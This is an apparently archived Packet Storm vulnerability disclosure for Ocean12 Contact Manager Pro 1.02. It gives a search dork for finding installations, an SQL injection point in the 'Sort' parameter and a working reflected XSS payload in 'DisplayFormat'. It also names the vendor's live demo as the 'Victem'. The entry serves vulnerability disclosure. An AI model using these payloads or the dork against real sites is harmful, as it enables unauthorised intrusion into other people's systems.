ocean12cm-sqlxss.txt

2008-11-29T00:00:00
ID PACKETSTORM:72388
Type packetstorm
Reporter Pouya Server
Modified 2008-11-29T00:00:00

Description

                                        
                                            `#########################################################  
---------------------------------------------------------  
Portal Name: Ocean12 Contact Manager Pro  
Version : 1.02  
Vendor : http://ocean12tech.com/products/contact  
Dork: Maintained with the Ocean12 Contact Manager Pro v1.02  
Author : Pouya_Server , Pouya.s3rver@Gmail.com  
Vulnerability : (SQL,XSS)  
---------------------------------------------------------  
#########################################################  
[SQL]:  
http://site.com/path/default.asp?DisplayFormat=Card&Sort=[SQL]  
  
[XSS]:  
http://site.com/path/?DisplayFormat=>"><ScRiPt>alert(1369)%3B</ScRiPt>&Action=Pouya_Server  
---------------------------------  
Victem :  
http://ocean12tech.com/products/contact/demo  
  
  
  
  
`